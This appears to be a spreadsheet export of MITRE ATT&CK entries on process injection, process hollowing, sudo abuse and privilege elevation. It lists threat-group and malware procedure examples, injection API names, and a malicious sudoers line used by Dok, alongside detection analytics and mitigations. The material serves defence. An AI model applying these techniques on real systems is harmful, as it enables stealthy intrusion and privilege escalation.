[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has dropped legitimate software onto a compromised host and used it to execute malicious DLLs.(Citation: ESET BackdoorDiplomacy Jun 2021)
Lazarus Group
A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample performs reflective DLL injection.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: Lazarus APT January 2022)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.(Citation: Accenture MUDCARP March 2019)
Putter Panda
An executable dropped onto victims by [Putter Panda](https://attack.mitre.org/groups/G0024) aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe).(Citation: CrowdStrike Putter Panda)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has been seen injecting a DLL into winword.exe.(Citation: IBM TA505 April 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has injected a DLL backdoor into dllhost.exe and svchost.exe.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used Metasploit to perform reflective DLL injection in order to escalate privileges.(Citation: ESET Turla Mosquito May 2018)(Citation: Github Rapid7 Meterpreter Elevate)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has injected malicious DLLs into memory with read, write, and execute permissions.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.(Citation: CheckPoint Naikon May 2020)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) has the ability to execute a malicious DLL by injecting into `explorer.exe` on a compromised machine.(Citation: Gigamon BADHATCH Jul 2019)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) injects its DLL component into svchost.exe.(Citation: F-Secure BlackEnergy 2014)
Bumblebee
The [Bumblebee](https://attack.mitre.org/software/S1039) loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)
Carberp
[Carberp](https://attack.mitre.org/software/S0484)'s bootkit can inject a malicious DLL into the address space of running processes.(Citation: ESET Carberp March 2012)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) has a command to inject code into a process.(Citation: ESET Carbon Mar 2017)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to load DLLs via reflective injection.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has injected its orchestrator DLL into explorer.exe. [ComRAT](https://attack.mitre.org/software/S0126) has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)
Conti
[Conti](https://attack.mitre.org/software/S0575) has loaded an encrypted DLL into memory and then executes it.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can use a .NET-based DLL named `RunPe6` for process injection.(Citation: Secureworks DarkTortilla Aug 2022)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) injects itself into the secure shell (SSH) process.(Citation: Airbus Derusbi 2015)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).(Citation: Symantec W32.Duqu)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) injects into other processes to load modules.(Citation: Symantec Dyre June 2015)
Elise
[Elise](https://attack.mitre.org/software/S0081) injects DLL files into iexplore.exe.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)
Emissary
[Emissary](https://attack.mitre.org/software/S0082) injects its DLL file into a newly spawned Internet Explorer process.(Citation: Lotus Blossom Dec 2015)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed injecting in to Explorer.exe and other processes. (Citation: Picus Emotet Dec 2018)(Citation: Trend Micro Banking Malware Jan 2019)(Citation: US-CERT Emotet Jul 2018)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) injects itself into various processes depending on whether it is low integrity or high integrity.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
FunnyDream
The [FunnyDream](https://attack.mitre.org/software/S1044) FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to inject DLLs into specific processes.(Citation: ESET Gelsemium June 2021)
Get2
[Get2](https://attack.mitre.org/software/S0460) has the ability to inject DLLs into processes.(Citation: Proofpoint TA505 October 2019)
HIDEDRV
[HIDEDRV](https://attack.mitre.org/software/S0135) injects a DLL for [Downdelph](https://attack.mitre.org/software/S0134) into the explorer.exe process.(Citation: ESET Sednit Part 3)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can inject a DLL into rundll32.exe for execution.(Citation: SentinelOne Aoqin Dragon June 2022)
IronNetInjector
[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to inject a DLL into running processes, including the [IronNetInjector](https://attack.mitre.org/software/S0581) DLL into explorer.exe.(Citation: Unit 42 IronNetInjector February 2021 )
Kazuar
If running in a Windows environment, [Kazuar](https://attack.mitre.org/software/S0265) saves a DLL to disk that is injected into the explorer.exe process to execute the payload. [Kazuar](https://attack.mitre.org/software/S0265) can also be configured to inject and execute within specific processes.(Citation: Unit 42 Kazuar May 2017)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can perform process injection by using a reflective DLL.(Citation: Github Koadic)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) has used the PowerKatz plugin that can be loaded into the address space of a PowerShell process through reflective DLL loading.(Citation: BiZone Lizar May 2021) 
Matryoshka
[Matryoshka](https://attack.mitre.org/software/S0167) uses reflective DLL injection to inject the malicious library and execute the RAT.(Citation: CopyKittens Nov 2015)
Maze
[Maze](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)	
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) loads &lt;code&gt;injecthelper.dll&lt;/code&gt; into a newly created &lt;code&gt;rundll32.exe&lt;/code&gt; process.(Citation: IBM MegaCortex)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).(Citation: Medium Metamorfo Apr 2020)
Mongall
[Mongall](https://attack.mitre.org/software/S1026) can inject a DLL into `rundll32.exe` for execution.(Citation: SentinelOne Aoqin Dragon June 2022)
Netwalker
The [Netwalker](https://attack.mitre.org/software/S0457) DLL has been injected reflectively into the memory of a legitimate running process.(Citation: TrendMicro Netwalker May 2020)	
PS1
[PS1](https://attack.mitre.org/software/S0613) can inject its payload DLL Into memory.(Citation: BlackBerry CostaRicto November 2020)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) can inject its modules into various processes using reflective DLL loading.(Citation: ESET PipeMon May 2020)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) can inject a malicious DLL into a process.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can migrate into another process using reflective DLL injection.(Citation: GitHub Pupy)
RARSTONE
After decrypting itself in memory, [RARSTONE](https://attack.mitre.org/software/S0055) downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system.(Citation: Camba RARSTONE)
RATANKBA
[RATANKBA](https://attack.mitre.org/software/S0241) performs a reflective DLL injection using a given pid.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;ImprovedReflectiveDLLInjection&lt;/code&gt; to deploy components.(Citation: Eset Ramsay May 2020) 
Remsec
[Remsec](https://attack.mitre.org/software/S0125) can perform DLL injection.(Citation: Kaspersky ProjectSauron Technical Analysis)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to inject a downloaded DLL into a newly created rundll32.exe process.(Citation: Proofpoint TA505 October 2019)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has injected its DLL component into `EhStorAurhn.exe`.(Citation: Malwarebytes Saint Bot April 2021)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has injected a DLL into svchost.exe.(Citation: Kaspersky ShadowPad Aug 2017)
Socksbot
[Socksbot](https://attack.mitre.org/software/S0273) creates a suspended svchost process and injects its DLL into it.(Citation: TrendMicro Patchwork Dec 2017)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;loadfromfile&lt;/code&gt;, &lt;code&gt;loadfromstorage&lt;/code&gt;, and &lt;code&gt;loadfrommem&lt;/code&gt; to inject a DLL  from disk, storage, or memory respectively.(Citation: BlackBerry CostaRicto November 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) injects an entire DLL into an existing, newly created, or preselected trusted process.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Sykipot
[Sykipot](https://attack.mitre.org/software/S0018) injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.(Citation: AlienVault Sykipot 2011)
Taidoor
[Taidoor](https://attack.mitre.org/software/S0011) can perform DLL loading.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject DLLs for malicious plugins into running processes.(Citation: Kaspersky TajMahal April 2019)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can use DLL injection to load embedded files and modules.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) is injected into a shared SVCHOST process.(Citation: Talos ZxShell Oct 2014) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services.
File Creation
Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
OS API Execution
Monitor for API calls that bypass process and/or signature based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. 
Process Creation
Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Windows Registry Key Modification
Monitor for changes made to Windows Registry keys and/or values that may forge credential materials that can be used to gain access to web applications or Internet services.
Disable or Remove Feature or Program
Many native binaries may not be necessary within a given environment.
Execution Prevention
Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.
Exploit Protection
Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass application control.
Privileged Account Management
Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) lnk files used for persistence have abused the Windows Update Client (&lt;code&gt;wuauclt.exe&lt;/code&gt;) to execute a malicious DLL.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
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&lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Process Access
Monitor for processes being viewed that may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.
Process Modification
Monitor for changes made to processes that may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
Gazer
[Gazer](https://attack.mitre.org/software/S0168) performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can inject a suspended thread of its own process into a new process and initiate via the &lt;code&gt;ResumeThread&lt;/code&gt; API.(Citation: Secureworks Karagany July 2019)
Waterbear
[Waterbear](https://attack.mitre.org/software/S0579) can use thread injection to inject shellcode into the process of security software.(Citation: Trend Micro Waterbear December 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)
Process Access
Monitor for processes being viewed that may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.
Process Modification
Monitor for changes made to processes that may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
Privileged Account Management
Utilize Yama (ex: /proc/sys/kernel/yama/ptrace_scope) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux, grsecurity, and AppArmor. 
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
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&lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Process Access
Monitor for processes being viewed that may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.
Process Creation
Monitor for newly executed processes that may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Adversaries may start legitimate processes and then use their memory space to run malicious code. This analytic looks for common Windows processes that have been abused this way in the past; when the processes are started for this purpose they may not have the standard parent that we would expect. This list is not exhaustive, and it is possible for cyber actors to avoid this discepency. These signatures only work if Sysmon reports the parent process, which may not always be the case if the parent dies before sysmon processes the event.
&lt;h4&gt;Analytic 1 - Processes Started From Irregular Parents&lt;/h4&gt;
&lt;code&gt;mismatch_processes = filter processes where ( parent_exe exists AND
  (exe="smss.exe" AND (parent_exe!="smss.exe" AND parent_exe!="System") OR
  (exe="csrss.exe" AND (parent_exe!="smss.exe" AND parent_exe!="svchost.exe")) OR
  (exe="wininit.exe" AND parent_exe!="smss.exe") OR
  (exe="winlogon.exe" AND parent_exe!="smss.exe") OR
  (exe="lsass.exe" AND (parent_exe!="wininit.exe" AND parent_exe!="winlogon.exe")) OR
  (exe="LogonUI.exe" AND (parent_exe!="winlogon.exe" AND parent_exe!="wininit.exe")) OR
  (exe="services.exe" AND parent_exe!="wininit.exe") OR
  (exe="spoolsv.exe" AND parent_exe!="services.exe") OR
  (exe="taskhost.exe" AND (parent_exe!="services.exe" AND parent_exe!="svchost.exe")) OR
  (exe="taskhostw.exe" AND (parent_exe!="services.exe" AND parent_exe!="svchost.exe")) OR
  (exe="userinit.exe" AND (parent_exe!="dwm.exe" AND parent_exe!="winlogon.exe"))&lt;/code&gt;
Process Modification
Monitor for changes made to processes that may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use process hollowing to inject one of its trojans into another process.(Citation: Unit 42 Gorgon Group Aug 2018)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing.(Citation: Talos Kimsuky Nov 2021)
Patchwork
A [Patchwork](https://attack.mitre.org/groups/G0040) payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.(Citation: Cymmetria Patchwork)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used process hollowing to execute CyberGate malware.(Citation: Cisco Operation Layover September 2021)
Threat Group-3390
A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can spawn `svchost.exe` and inject the payload into that process.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used process hollowing in iexplore.exe to load the [RedLeaves](https://attack.mitre.org/software/S0153) implant.(Citation: Accenture Hogfish April 2018)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.(Citation: SentinelLabs Agent Tesla Aug 2020) 
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.(Citation: Unit42 Azorult Nov 2018)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and use process hollowing to inject it into a new process.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) has been seen loaded into msiexec.exe through process hollowing to hide its execution.(Citation: Palo Alto Networks BBSRAT)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has been launched by starting iexplore.exe and replacing it with [Bandook](https://attack.mitre.org/software/S0234)'s payload.(Citation: Lookout Dark Caracal Jan 2018)(Citation: EFF Manul Aug 2016)(Citation: CheckPoint Bandook Nov 2020)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process including Svchost, Explorer, and cmd using process hollowing.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can execute binaries through process hollowing.(Citation: Trend Micro DRBControl February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use process hollowing for execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)
Denis
[Denis](https://attack.mitre.org/software/S0354) performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.(Citation: Cybereason Cobalt Kitty 2017)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) has used process hollowing shellcode to target a predefined list of processes from &lt;code&gt;%SYSTEM32%&lt;/code&gt;.(Citation: Securelist Dtrack)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) is capable of loading executable code via process hollowing.(Citation: Symantec W32.Duqu)
ISMInjector
[ISMInjector](https://attack.mitre.org/software/S0189) hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.(Citation: OilRig New Delivery Oct 2017)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has used process hollowing to inject itself into legitimate Windows process.(Citation: Infoblox Lokibot January 2019)(Citation: Talos Lokibot Jan 2021) 
NETWIRE
The [NETWIRE](https://attack.mitre.org/software/S0198) payload has been injected into benign Microsoft executables via process hollowing.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)
Orz
Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses process hollowing and [Regsvr32](https://attack.mitre.org/techniques/T1218/010) to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use process hollowing to execute its main payload.(Citation: ATT QakBot April 2021)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can launch itself from a hollowed svchost.exe process.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)
Saint Bot
The [Saint Bot](https://attack.mitre.org/software/S1018) loader has used API calls to spawn `MSBuild.exe` in a suspended state before injecting the decrypted [Saint Bot](https://attack.mitre.org/software/S1018) binary into it.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Smoke Loader
[Smoke Loader](https://attack.mitre.org/software/S0226) spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Microsoft Dofoil 2018)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) can use RunPE to execute malicious payloads within a hollowed Windows process.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) injects into the svchost.exe process.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Cyberreason Anchor December 2019)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used process hollowing to inject into child processes.(Citation: FireEye Ursnif Nov 2017)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`.(Citation: Cisco Ukraine Wipers January 2022)(Citation: RecordedFuture WhisperGate Jan 2022)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can create a suspended notepad process and write shellcode to delete a file into the suspended process using `NtWriteVirtualMemory`.(Citation: MalwareBytes WoodyRAT Aug 2022) 
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
OS API Execution
Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) has used [Process Doppelgänging](https://attack.mitre.org/techniques/T1055/013) to evade security software while deploying tools on compromised systems.(Citation: Symantec Leafminer July 2018)	
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process using process doppelgänging.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
SynAck
[SynAck](https://attack.mitre.org/software/S0242) abuses NTFS transactions to launch and conceal malicious processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may perform sudo caching and/or use the suoders file to elevate privileges, such as the &lt;code&gt;sudo&lt;/code&gt; command.
File Modification
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.
Process Creation
Monitor newly executed processes that may perform sudo caching and/or use the suoders file to elevate privileges.
Process Metadata
Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may perform sudo caching and/or use the suoders file to elevate privileges.
Operating System Configuration
Ensuring that the &lt;code&gt;tty_tickets&lt;/code&gt; setting is enabled will prevent this leakage across tty sessions.
Privileged Account Management
By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file. Setting the &lt;code&gt;timestamp_timeout&lt;/code&gt; to 0 will require the user to input their password every time &lt;code&gt;sudo&lt;/code&gt; is executed.
Restrict File and Directory Permissions
The sudoers file should be strictly edited such that passwords are always required and that users can't spawn risky processes as users with higher privilege.
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;sudo&lt;/code&gt; to run a command.(Citation: Cobalt Strike Manual 4.3 November 2020)
Dok
[Dok](https://attack.mitre.org/software/S0281) adds &lt;code&gt;admin  ALL=(ALL) NOPASSWD: ALL&lt;/code&gt; to the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.(Citation: hexed osx.dok analysis 2019)
Proton
[Proton](https://attack.mitre.org/software/S0279) modifies the tty_tickets line in the sudoers file.(Citation: objsee mac malware 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.
File Metadata
Monitor the file system for files that have the setuid or setgid bits set. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
File Modification
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file. Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called.
OS API Execution
Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055). Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
Process Creation
Monitor for newly executed processes that may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Cyber actors frequently escalate to the SYSTEM account after gaining entry to a Windows host, to enable them to carry out various attacks more effectively. Tools such as Meterpreter, Cobalt Strike, and Empire carry out automated steps to “Get System”, which is the same as switching over to the System user account. Most of these tools utilize multiple techniques to try and attain SYSTEM: in the first technique, they create a named pipe and connects an instance of cmd.exe to it, which allows them to impersonate the security context of cmd.exe, which is SYSTEM. In the second technique, a malicious DLL is injected into a process that is running as SYSTEM; the injected DLL steals the SYSTEM token and applies it where necessary to escalate privileges. This analytic looks for both of these techniques.
&lt;h4&gt; Analytic 1 : Get System Elevation &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter processes where (
  (parent_image_path == C:\Windows\System32\services.exe" AND
   image_path == "C:\Windows\System32\cmd.exe" AND
   command_line == "*echo*" AND
   command_line == "*\pipe\*") OR
  (image_path == "C:\Windows\System32\rundll32.exe" AND
   command_line == "*,a /p:*")) &lt;/code&gt;
Process Metadata
Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.
User Account Modification
Log cloud API calls to assume, create, or impersonate additional roles, policies, and permissions. Review uses of just-in-time access to ensure that any justifications provided are valid and only expected actions were taken.
Windows Registry Key Modification
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.
Audit
Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate.(Citation: Github UACMe)
Execution Prevention
System settings can prevent applications from running that haven't been downloaded from legitimate repositories which may help mitigate some of these issues. Not allowing unsigned applications from being run may also mitigate some risk.
Operating System Configuration
Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system. Ensuring that the sudo tty_tickets setting is enabled will prevent this leakage across tty sessions.
Privileged Account Management
Remove users from the local administrator group on systems.
